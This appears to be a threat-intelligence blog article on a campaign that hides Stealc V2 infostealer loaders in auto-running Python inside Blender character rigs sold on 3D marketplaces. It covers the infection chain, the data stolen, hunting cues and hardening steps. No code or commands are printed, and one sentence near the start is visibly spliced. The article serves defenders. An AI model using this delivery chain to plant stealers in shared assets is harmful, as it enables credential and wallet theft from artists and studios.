A Russian-speaking threat actor is quietly weaponizing 3D model marketplaces, planting malicious Blender project files that deliver the 𝗦𝘁𝗲𝗮𝗹𝗰 𝗩𝟮 information-stealing malware to artists, freelancers, and studios. The operation relies on realistic-looking character rigs published on platforms such as CGTrader, then abuses Blender’s ability to run embedded Python scripts to pivot from a creative workflow into a full credential theft compromise.ipelines, render farms, or asset repositories, this delivery vector gives attackers immediate access to environments that typically hold high-value accounts, source files, and in many cases, payment details. That shift turns a seemingly niche 3D content problem into a mainstream enterprise security issue.
𝗕𝗹𝗲𝗻𝗱𝗲𝗿 𝗮𝘀 𝗮 𝗺𝗮𝗹𝘄𝗮𝗿𝗲 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝘆 𝗰𝗵𝗮𝗻𝗻𝗲𝗹
Blender supports rich automation through Python. Riggers and technical artists routinely embed scripts in .blend files to build custom user interfaces, automate rig controls, or drive complex animation systems. When the 𝗔𝘂𝘁𝗼 𝗥𝘂𝗻 𝗣𝘆𝘁𝗵𝗼𝗻 𝗦𝗰𝗿𝗶𝗽𝘁𝘀 option is enabled, those scripts execute automatically as soon as a project file is opened, without additional user interaction.
In a normal pipeline, that convenience saves time and allows advanced rigs to “just work” out of the box. In this campaign, the same feature becomes the initial execution vector. The adversary uploads character rigs that appear attractive and technically polished. As soon as a target opens the downloaded file with Auto Run enabled, the embedded Python code runs in the background and silently starts the infection chain.
𝗙𝗿𝗼𝗺 𝘁𝗿𝘂𝘀𝘁𝗲𝗱 𝗺𝗼𝗱𝗲𝗹 𝗳𝗶𝗹𝗲 𝘁𝗼 𝗮 𝗦𝘁𝗲𝗮𝗹𝗰 𝗽𝗮𝘆𝗹𝗼𝗮𝗱
The malicious Blender files embed Python that contacts attacker-controlled infrastructure hosted behind Cloudflare Workers. From there, the script downloads a loader component that orchestrates the next stages.
That loader retrieves two archives, named 𝗭𝗮𝗹𝘆𝗽𝗮𝗚𝘆𝗹𝗶𝘃𝗲𝗿𝗮𝗩𝟭 and 𝗕𝗟𝗘𝗡𝗗𝗘𝗥𝗫, from IP addresses owned by the threat actor. After extraction into the Windows temporary directory, the malware creates shortcut files in the Startup folder, giving the attackers persistence across reboots without adding noisy new services or scheduled tasks. The same stage drops two data-theft components: the main 𝗦𝘁𝗲𝗮𝗹𝗰 𝗶𝗻𝗳𝗼𝘀𝘁𝗲𝗮𝗹𝗲𝗿 and an auxiliary Python-based stealer that likely exists as a fallback if the primary payload fails or gets blocked.
By the time the victim starts exploring the rig or moving the 3D model into a project, the system has already reached a post-compromise state. No exploit kit, no phishing page, just a “legitimate” asset file that behaves like an application.
𝗪𝗵𝘆 𝘁𝗵𝗶𝘀 𝗰𝗮𝗺𝗽𝗮𝗶𝗴𝗻 𝗱𝗿𝗼𝗽𝘀 𝗦𝘁𝗲𝗮𝗹𝗰 𝗩𝟮
Stealc emerged as a MaaS (Malware-as-a-Service) infostealer around 2023, positioned as a competitor and copycat of families such as Vidar, Raccoon, Mars, and RedLine. It gained traction quickly in Russian-language cybercrime forums due to its modular design, active development roadmap, and focus on credential and wallet theft.
The variant used in the Blender campaign tracks with the second major version of Stealc. Public reporting indicates that this branch extends support to more than twenty mainstream browsers, a long list of browser extensions, and numerous desktop applications. In this operation, the malware focuses on:
– Harvesting credentials and session cookies from Chromium-based and Gecko-based browsers, with server-side decryption for newer Chrome builds.
– Targeting a broad catalog of cryptocurrency browser extensions and standalone wallet applications in an effort to drain funds or resell seed phrases.
– Extracting tokens and chat data from messaging platforms such as Telegram and Discord, along with other communication tools frequently used in gaming and creative communities.
– Pulling configuration data from VPN clients and email programs like Thunderbird to support later lateral movement or business email compromise.
The Stealc family also continues to evolve its evasion layer. Analysts watching this campaign note that the sample tied to the Blender delivery path initially went undetected by security engines on multi-scanner platforms, which aligns with Stealc’s reputation for fast iteration and packing changes.
𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗧𝗥𝗜 𝗮𝗻𝗱 𝗵𝘂𝗻𝘁𝗶𝗻𝗴 𝗰𝗼𝗻𝘀𝗶𝗱𝗲𝗿𝗮𝘁𝗶𝗼𝗻𝘀
From a detection and response standpoint, the interesting part of this campaign is the blend of benign-looking activity and a very conventional infostealer objective. Most SOCs do not have rules tuned for “suspicious Blender project behavior,” yet the observable telemetry still exposes several footholds for defenders who know where to look.
On endpoints that run Blender, security teams should pay attention to:
– Blender processes that spawn Python or PowerShell in close succession, especially when accompanied by network connections to previously unseen domains or IP ranges.
– PowerShell invoking download-and-execute patterns, including one-liners that use standard web cmdlets to retrieve remote scripts.
– Archive extraction into the system temporary directory followed by the creation of shortcut files in Startup, particularly when the archive names do not match any known tooling in the environment.
– New binaries or scripts that start shortly after Blender file opens, then persist independently of the main application.
Stealc-specific hunting then layers on top of that Blender-centric telemetry. Defenders should correlate web credential access from processes outside normal browser parents, large exfiltration bursts toward unfamiliar infrastructure, and rapid enumeration of wallet, browser, and VPN directories shortly after a suspect file opens. Threat intel from recent Stealc campaigns can provide C2 patterns and YARA rules suitable for deeper sweeps.
𝗦𝘂𝗽𝗽𝗹𝘆-𝗰𝗵𝗮𝗶𝗻 𝗿𝗶𝘀𝗸𝘀 𝗶𝗻 𝟯𝗗 𝗺𝗼𝗱𝗲𝗹 𝗺𝗮𝗿𝗸𝗲𝘁𝗽𝗹𝗮𝗰𝗲𝘀
Public 3D marketplaces such as CGTrader and similar platforms function as supply-chain hubs in many studios and freelance pipelines. Artists often download rigs, props, and environments on tight deadlines and import them directly into client workspaces. Although those platforms enforce terms of service and provide general security guidance, they cannot feasibly statically or dynamically analyze every embedded script inside user-uploaded .blend files.
That reality creates a gap where adversaries can blend malicious files into a vast sea of legitimate content. In this Stealc campaign, the attackers leaned into that trust, publishing rigs that look useful and professional enough to attract both hobbyists and professionals. Once those assets spread organically through bookmarks, project folders, and shared drives, the malicious payload travels with them.
For security engineers, it helps to treat these marketplaces the same way you already treat public code repositories or open-source packages: as untrusted sources until proven otherwise.
𝗕𝗲𝘀𝘁 𝗽𝗿𝗮𝗰𝘁𝗶𝗰𝗲𝘀 𝗳𝗼𝗿 𝗕𝗹𝗲𝗻𝗱𝗲𝗿 𝘂𝘀𝗲𝗿𝘀 𝗮𝗻𝗱 𝘀𝘁𝘂𝗱𝗶𝗼𝘀
For individual artists and for studios with established pipelines, several practical steps reduce the blast radius of this class of attack without blocking Blender outright.
First, Blender’s own documentation emphasizes caution around 𝗔𝘂𝘁𝗼 𝗥𝘂𝗻 𝗣𝘆𝘁𝗵𝗼𝗻 𝗦𝗰𝗿𝗶𝗽𝘁𝘀. Where possible, that option should remain disabled by default. Users can explicitly trust local projects they created themselves or files received through vetted internal channels, while treating downloads from marketplaces as untrusted until they pass review.
Second, organizations can isolate risky workflows. Many studios already segment render nodes and file servers; the same logic applies here. Running marketplace-sourced files inside dedicated virtual machines or sandboxed hosts reduces direct exposure of production passwords, SSO sessions, and payment credentials. That isolation also yields clean telemetry because background activity on those hosts tends to be more predictable.
Third, security teams can build simple internal guidelines for 3D asset hygiene: who can download external rigs, which paths Blender treats as trusted sources, and when it is acceptable to enable script execution permanently. Combining those policies with lightweight monitoring around Blender hosts gives defenders more signal and less guesswork.
𝗪𝗵𝗮𝘁 𝘁𝗵𝗶𝘀 𝗺𝗲𝗮𝗻𝘀 𝗳𝗼𝗿 𝗯𝗿𝗼𝗮𝗱𝗲𝗿 𝗶𝗻𝗳𝗼𝘀𝘁𝗲𝗮𝗹𝗲𝗿 𝘁𝗿𝗲𝗻𝗱𝘀
Stealc slots neatly into a much broader rise in infostealer operations. Recent industry reporting estimates that infostealers now drive enormous volumes of credential theft and contribute heavily to follow-on ransomware, account takeover, and cloud breaches. The Blender campaign does not introduce a brand-new malware family; instead, it illustrates how mature infostealers ride novel initial access paths into new communities.
For defenders, that pattern reinforces a familiar message. It is no longer enough to watch email gateways and office documents. Security programs that touch creative industries, gaming, or design should assume that 3D assets, texture packs, and plugin bundles can carry the same level of risk as browser extensions or cracked software.
One thought on “How Malicious Blender Files Deliver Stealc Malware to 3D Artists”